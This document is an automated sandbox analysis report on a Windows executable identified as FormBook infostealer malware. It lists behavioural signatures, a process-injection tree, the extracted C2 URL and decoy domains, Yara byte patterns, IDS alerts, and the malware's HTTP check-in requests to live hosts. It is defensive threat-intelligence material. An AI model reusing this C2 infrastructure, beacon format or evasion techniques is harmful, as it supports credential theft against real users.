
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1579888
MD5: b96e6785937bd52b1281fb98f0abcf25
SHA1: d27572ada589769bfdb99dabbd485556e39010ba
SHA256: 519678c24f6036d935bdd915090f07ad1fea068dc2491861648c6b00698de514
Tags: exe, user-jstrosch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
Potential key logger detected (key state polling based)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 5324 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B96E6785937BD52B1281FB98F0ABCF25)
    • svchost.exe (PID: 5020 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • autoconv.exe (PID: 1188 cmdline: "C:\Windows\SysWOW64\autoconv.exe" MD5: A705C2ACED7DDB71AFB87C4ED384BED6)
        • wlanext.exe (PID: 2924 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)
          • cmd.exe (PID: 2700 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • explorer.exe (PID: 3052 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WerFault.exe (PID: 5716 cmdline: C:\Windows\system32\WerFault.exe -u -p 2580 -s 5640 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup

Malware Configuration

{"C2 list": ["www.7b5846.online/hwu6/"], "decoy": ["lf758.vip", "locerin-hair.shop", "vytech.net", "pet-insurance-intl-7990489.live", "thepolithat.buzz", "d66dr114gl.bond", "suv-deals-49508.bond", "job-offer-53922.bond", "drstone1.click", "lebahsemesta57.click", "olmanihousel.shop", "piedmontcsb.info", "trisula888x.top", "66sodovna.net", "dental-implants-83810.bond", "imxtld.club", "frozenpines.net", "ffgzgbl.xyz", "tlc7z.rest", "alexismuller.design", "6vay.boats", "moocatinght.top", "hafwje.bond", "edmaker.online", "simo1simo001.click", "vbsdconsultant.click", "ux-design-courses-53497.bond", "victory88-pay.xyz", "suarahati7.xyz", "otzen.info", "hair-transplantation-65829.bond", "gequiltdesins.shop", "inefity.cloud", "jeeinsight.online", "86339.xyz", "stairr-lift-find.today", "wdgb20.top", "91uvq.pro", "energyecosystem.app", "8e5lr5i9zu.buzz", "migraine-treatment-36101.bond", "eternityzon.shop", "43mjqdyetv.sbs", "healthcare-software-74448.bond", "bethlark.top", "dangdut4dselalu.pro", "04506.club", "rider.vision", "health-insurance-cake.world", "apoppynote.com", "11817e.com", "hiefmotelkeokuk.top", "sugatoken.xyz", "aragamand.business", "alifewithoutlimits.info", "vibrantsoul.xyz", "olarpanels-outlet.info", "ozzd86fih4.online", "skbdicat.xyz", "cloggedpipes.net", "ilsgroup.net", "ptcnl.info", "backstretch.store", "maheshg.xyz"]}

Yara matches on memory dumps
Source | Rule | Description | Author (matched strings are listed beneath each rule)
00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18819:$sqlite3step: 68 34 1C 7B E1
  • 0x1892c:$sqlite3step: 68 34 1C 7B E1
  • 0x18848:$sqlite3text: 68 38 2A 90 C5
  • 0x1896d:$sqlite3text: 68 38 2A 90 C5
  • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18983:$sqlite3blob: 68 53 D8 7F 8C

Yara matches on unpacked PE files
Source | Rule | Description | Author (matched strings are listed beneath each rule)
1.2.svchost.exe.2490000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.svchost.exe.2490000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.2490000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.svchost.exe.2490000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.svchost.exe.2490000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17a19:$sqlite3step: 68 34 1C 7B E1
  • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a48:$sqlite3text: 68 38 2A 90 C5
  • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C

System Summary

Sigma rule matches
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5324, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\Desktop\file.exe", ProcessId: 5020, ProcessName: svchost.exe
Source: Process started | Author: Tim Rauch | Data: Command: /c del "C:\Windows\SysWOW64\svchost.exe", CommandLine: /c del "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\wlanext.exe", ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 2924, ParentProcessName: wlanext.exe, ProcessCommandLine: /c del "C:\Windows\SysWOW64\svchost.exe", ProcessId: 2700, ProcessName: cmd.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\file.exe", CommandLine: "C:\Users\user\Desktop\file.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5324, ParentProcessName: file.exe, ProcessCommandLine: "C:\Users\user\Desktop\file.exe", ProcessId: 5020, ProcessName: svchost.exe

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T13:58:16.204199+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49772 | 45.38.60.47 | 80 | TCP
2024-12-23T13:58:37.356933+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49819 | 198.252.111.49 | 80 | TCP
2024-12-23T13:59:00.358258+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49885 | 104.21.40.196 | 80 | TCP


AV Detection

Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.7b5846.online/hwu6/"], "decoy": ["lf758.vip", "locerin-hair.shop", "vytech.net", "pet-insurance-intl-7990489.live", "thepolithat.buzz", "d66dr114gl.bond", "suv-deals-49508.bond", "job-offer-53922.bond", "drstone1.click", "lebahsemesta57.click", "olmanihousel.shop", "piedmontcsb.info", "trisula888x.top", "66sodovna.net", "dental-implants-83810.bond", "imxtld.club", "frozenpines.net", "ffgzgbl.xyz", "tlc7z.rest", "alexismuller.design", "6vay.boats", "moocatinght.top", "hafwje.bond", "edmaker.online", "simo1simo001.click", "vbsdconsultant.click", "ux-design-courses-53497.bond", "victory88-pay.xyz", "suarahati7.xyz", "otzen.info", "hair-transplantation-65829.bond", "gequiltdesins.shop", "inefity.cloud", "jeeinsight.online", "86339.xyz", "stairr-lift-find.today", "wdgb20.top", "91uvq.pro", "energyecosystem.app", "8e5lr5i9zu.buzz", "migraine-treatment-36101.bond", "eternityzon.shop", "43mjqdyetv.sbs", "healthcare-software-74448.bond", "bethlark.top", "dangdut4dselalu.pro", "04506.club", "rider.vision", "health-insurance-cake.world", "apoppynote.com", "11817e.com", "hiefmotelkeokuk.top", "sugatoken.xyz", "aragamand.business", "alifewithoutlimits.info", "vibrantsoul.xyz", "olarpanels-outlet.info", "ozzd86fih4.online", "skbdicat.xyz", "cloggedpipes.net", "ilsgroup.net", "ptcnl.info", "backstretch.store", "maheshg.xyz"]}
Source: file.exe | ReversingLabs: Detection: 31%
Source: Yara match | File source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: wntdll.pdbUGP source: file.exe, 00000000.00000003.1653421088.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1653291010.00000000038F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710817666.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653864785.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710817666.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1655820740.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2918452334.00000000033CE000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2918452334.0000000003230000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1710636242.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1713704184.000000000307F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: file.exe, 00000000.00000003.1653421088.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1653291010.00000000038F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1710817666.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653864785.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710817666.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1655820740.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.2918452334.00000000033CE000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2918452334.0000000003230000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1710636242.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000003.1713704184.000000000307F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb source: svchost.exe, 00000001.00000003.1710078947.000000000281C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710157021.000000000282E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710780158.0000000002E30000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000004.00000002.2916594410.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.2703671966.0000000010ECF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.2916106098.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2920530492.000000000377F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2999055949.000000000BB3F000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.2703671966.0000000010ECF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.2916106098.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000004.00000002.2920530492.000000000377F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000E.00000002.2999055949.000000000BB3F000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wlanext.pdbGCTL source: svchost.exe, 00000001.00000003.1710078947.000000000281C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710157021.000000000282E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1710780158.0000000002E30000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.2916594410.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F06CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F06CA9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00F060DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00F063F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F0EB60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F0F5FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0F56F FindFirstFileW,FindClose,0_2_00F0F56F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F11B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F11B2F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F11C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F11C8A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F11F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F11F94
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi 1_2_024A7D7F
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi 4_2_00AB7D7F

Networking

Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49819 -> 198.252.111.49:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49819 -> 198.252.111.49:80
Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49772 -> 45.38.60.47:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49772 -> 45.38.60.47:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49772 -> 45.38.60.47:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49819 -> 198.252.111.49:80
Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49885 -> 104.21.40.196:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49885 -> 104.21.40.196:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49885 -> 104.21.40.196:80
Source: C:\Windows\explorer.exe | Network Connect: 45.38.60.47 80
Source: C:\Windows\explorer.exe | Network Connect: 104.21.40.196 80
Source: C:\Windows\explorer.exe | Network Connect: 198.252.111.49 80
Source: Malware configuration extractor | URLs: www.7b5846.online/hwu6/
Source: global traffic | HTTP traffic detected: GET /hwu6/?NvW8gh=3eE7W8JGsE0Z0gf0dkzWoMqC44Ih/LpQP6YOK8HSo/jc9NPr5lNFbiMzFCC+b/Y1vVpG&1bd=qBZpwRT8rpbTOZn HTTP/1.1 | Host: www.vytech.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hwu6/?NvW8gh=ODu4ekR727XBQcKUwHIo8nVNut1O1Z6HvIEUsjxvVtHRsmxVrOVq8qUINChS6+VnMtr8&1bd=qBZpwRT8rpbTOZn HTTP/1.1 | Host: www.lebahsemesta57.click | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hwu6/?adoHn6=uXc87hFXpvg4&Rl7=YeF1y3FAQJcqH3tuWfJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd1rezRCsTdps HTTP/1.1 | Host: www.7b5846.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 104.21.40.196 104.21.40.196
Source: Joe Sandbox View | ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: SOFTLAYERUS SOFTLAYERUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 6 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F14EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00F14EB5
Source: global traffic | DNS traffic detected: DNS query: www.imxtld.club
Source: global traffic | DNS traffic detected: DNS query: www.ux-design-courses-53497.bond
Source: global traffic | DNS traffic detected: DNS query: www.vytech.net
Source: global traffic | DNS traffic detected: DNS query: www.lebahsemesta57.click
Source: global traffic | DNS traffic detected: DNS query: api.msn.com
Source: global traffic | DNS traffic detected: DNS query: www.7b5846.online
Source: explorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1666389880.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2756647360.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1666389880.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2756647360.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1666389880.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2756647360.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000000.1660518211.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2695744148.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1666389880.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2756647360.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2976289585.0000000008A9F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.1660518211.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.1667358180.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2696706638.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3013715167.000000000C852000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2842463004.000000000C85B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2809659599.000000000C857000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2819005763.000000000C85E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mi
